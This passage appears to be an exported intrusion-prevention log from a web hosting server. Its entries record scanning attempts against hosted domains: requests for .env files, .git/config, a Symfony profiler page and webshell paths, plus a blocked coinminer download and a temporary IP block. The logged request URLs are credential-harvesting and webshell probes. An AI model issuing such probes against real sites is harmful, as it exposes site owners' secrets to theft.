000003c3	01dc9457f8940b89	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457d2971e65	01dc9457d2971e65	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQyOTNFQjUyLTk0NTctMTFGMS05NTgyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cc6c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://hostmaster.pct.com.vn/.env.backup			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bd	01dc9457f8940b89	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457d2a30a75	01dc9457d2a30a75	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQyQTIxOUIzLTk0NTctMTFGMS05NTg4LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cc72	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://mail1.pct.com.vn/.env.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc9457fbe736f2	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457d69aa35d	01dc9457d69aa35d	00000001	00000128	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQ2OTc4MEJDLTk0NTctMTFGMS05NzMxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjksIm5hbWUiOiJBdWRpdDogUG9zc2libGUgTWlzY29uZmlndXJlZCBTeW1mb255IEFwcGxpY2F0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000081f5	00010000	00000002	00000002	0000ab00	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://pct.com.vn/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000213	01dc94580c85555f	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc945809d8b243	01dc94596f796e43	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 10:24:35 PM to 2/2/2026 10:34:35 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b1	01dc94581d25a6ad	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457f6c7dd96	01dc9457f6c7dd96	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY2QzU1NTVDLTk0NTctMTFGMS04MkIwLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000ae98	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://pct.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b9	01dc9458207b47e0	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457fcb6a942	01dc9457fcb6a942	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkZDQjVFODdCLTk0NTctMTFGMS04NzJFLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000e604	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://pct.com.vn/.env.example			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b7	01dc945823ce733e	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457fce193a0	01dc9457fce193a0	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkZDREU3MEQxLTk0NTctMTFGMS04NzNGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000e604	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://pct.com.vn/.env.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b4	01dc94582a73c553	000000ce	0000000f	164a8367	35b6d7b5	00000002	00000002	00000001	01dc945804958726	01dc945804958726	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjA0OTUxNjVELTk0NTgtMTFGMS1CODdCLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00008b6c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://khangviet.net/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b8	01dc94582a73c553	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc945805fd8bef	01dc945805fd8bef	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjA1RkQ2N0U1LTk0NTgtMTFGMS1CQjEyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000a322	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://pct.com.vn/.env.backup			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000db9	01dc94582dc6f573	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94580928434a	01dc94580928434a	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQwNjc2LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDQ1MDQwOTA5LCJ1aWQiOiJBRjZCRjBDOC0wMDQ4LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiIwOTI3RDI3Ri05NDU4LTExRjEtQkE2Ni04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000d9c6	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770045871.1589369773864746093750			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
0000039a	01dc94585fa648c1	000000ce	0000000f	164a8367	c475caac	00000002	00000002	00000001	01dc945839276ca4	01dc945839276ca4	00000001	00000110	[SID: 32329] Audit: Malicious Scan Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjM5MjQxOTY4LTk0NTgtMTFGMS1BRTg3LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIzMjksIm5hbWUiOiJBdWRpdDogTWFsaWNpb3VzIFNjYW4gQXR0ZW1wdCAyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		00007e49	00010000	00000002	00000002	000095ba	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Malicious Scan Attempt 2	http://103.131.74.22/developmentserver/metadatauploader			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b8	01dc9458a22290b3	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc94587c9301f0	01dc94587c9301f0	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjdDOTIyREUyLTk0NTgtMTFGMS04QUNGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000e226	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://homepage2.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b3	01dc9458af71b9fe	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc94588b984f72	01dc94588b984f72	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhCOTVDOTVFLTk0NTgtMTFGMS04MzFCLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000e6a4	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://home.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000216	01dc945994d972f9	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc94596f91756c	01dc94596f91756c	00000001	00000000	Active Response that started at 2/2/2026 10:24:35 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b7	01dc945aff2ac256	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc945ad8682767	01dc945ad8682767	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQ4NjdGMTEzLTk0NUEtMTFGMS04ODEyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000a5ec	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://homepage.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000396	01dc945c05c1ea3c	000000ce	0000000f	164a8367	b7d16a57	00000002	00000002	00000001	01dc945bdfd5d42a	01dc945bdfd5d42a	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkRGRDRGRkY5LTk0NUItMTFGMS1BNjhGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000ca73	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://www.phutungfordsaigon.com/userfuns.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039b	01dc945c4197f0a4	000000ce	0000000f	164a8367	82c9be04	00000002	00000002	00000001	01dc945c1bed7a58	01dc945c1bed7a58	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjFCRUQ2NjI0LTk0NUMtMTFGMS04MUMzLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	0000a045	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://hostmaster.sieuthighevanphong.com/shell.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b8	01dc945d8e1c1f7a	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc945d68c5707a	01dc945d68c5707a	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjY4QzI0OTg5LTk0NUQtMTFGMS1CRDVDLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000c530	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://homepage3.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b8	01dc945e44dc5f20	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc945e1fafb236	01dc945e1fafb236	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjFGQUQyQzkyLTk0NUUtMTFGMS1BODE0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000909c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://homepage1.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000e16	01dc945f26b5bb8c	000000ce	0000000f	0100007f	19cb4ccc	00000002	00000002	00000001	01dc945efff20027	01dc945efff20027	00000001	00000b50	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: C:\PROGRAM FILES\DOTNET\DOTNET.EXE		C:\PROGRAM FILES\DOTNET\DOTNET.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiZG90bmV0XCIgLlxcTGl2ZXdlYi5XZWIuZGxsIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJjcmVhdGVkIjoxNzYzNTQxOTM4MDAwLCJmb2xkZXIiOiJjOlxccHJvZ3JhbSBmaWxlc1xcZG90bmV0XFwiLCJtZDUiOiI4RDU4QTkwNjdENTgzMDI1NkQxQjhBQUU2NzZEQzJGOCIsIm5hbWUiOiJkb3RuZXQuZXhlIiwicGF0aCI6ImM6XFxwcm9ncmFtIGZpbGVzXFxkb3RuZXRcXGRvdG5ldC5leGUiLCJwcm9kdWN0X25hbWUiOiIuTkVUIiwic2hhMSI6IkYyNjI0NTcyNjQxRDE1MkI2MDdBQ0UzNzE2NTZERTk0MDAxREE3QjgiLCJzaGEyIjoiRjg1NzU5OEQ0RkQ4MzBGMzZEMjUxRkJCNjAxMTg3MzkwNDE1NEE0NkNBODg4NURGODQ5NjNDRjM4MEE3Q0E2NiIsInNpZ25hdHVyZV9jb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJzaWduYXR1cmVfY3JlYXRlZF9kYXRlIjoxNzYzNTY3MDUxMDAwLCJzaWduYXR1cmVfaXNzdWVyIjoiTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0EgMjAxMSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUyMDc3MDA3MSwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzEsMiwzLDUsMTYsMTcsMTgsMjBdLCJ2ZXJzaW9uIjoiMTAuMC4xIEBDb21taXQ6IGZhZDI1M2Y1MWI0NjE3MzZkZmQzY2Q5YzE1OTc3YmI3NDkzYmVjZWYiLCJ4YXR0cmlidXRlcyI6eyJwb3J0YWwiOmZhbHNlfX0sInBpZCI6MjA2MDgsInNlc3Npb25faWQiOjAsInN0YXJ0X3RpbWUiOjE3NzAwMTk5NzE5MjEsInVpZCI6IjY1RjMwMDA1LTAwMEUtRjFGMS1COUVDLUUwRDBGNzg0MENCQiJ9LCJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkZGRUYwQ0IzLTk0NUUtMTFGMS05NjIzLTgwNkU2RjZFNjk2MyIsInBhcmVudCI6eyJjbWRfbGluZSI6ImM6XFx3aW5kb3dzXFxzeXN0ZW0zMlxcaW5ldHNydlxcdzN3cC5leGUgLWFwIFwia2hvZGllbm1heWhjLnZuKGRvbWFpbikoNC4wKShwb29sKVwiIC12IFwidjQuMFwiIC1sIFwid2ViZW5naW5lNC5kbGxcIiAtYSBcXFxcLlxccGlwZVxcaWlzaXBtZDFkZjUwNDctYjg1MS00ZDhiLTk4YjItMzQzN2E4ZGUzZjBmIC1oIFwiQzpcXGluZXRwdWJcXHRlbXBcXGFwcHBvb2xzXFxraG9kaWVubWF5aGMudm4oZG9tYWluKSg0LjApKHBvb2wpXFxraG9kaWVubWF5aGMudm4oZG9tYWluKSg0LjApKHBvb2wpLmNvbmZpZ1wiIC13IFwiXCIgLW0gMCAtdCAxNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE1OSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxpbmV0c3J2XFwiLCJtZDUiOiI3QzZCNTMxMzU2MkU4QkJEMkI0RDVBNTExMjlERUQ5RiIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzdGVtMzJcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiNEZFMTM5MjNGNDJENjQ3MzRBOEIwNUFCNDAzRjgwRTRGODY0MkIzMyIsInNoYTIiOiI5QzQxNjJCMTI5QzE3NTA3NzYwNjVBNzcyMjY4RUYxMjkyQjdDREY1MURCNkIwMDhFRkJBQjQ0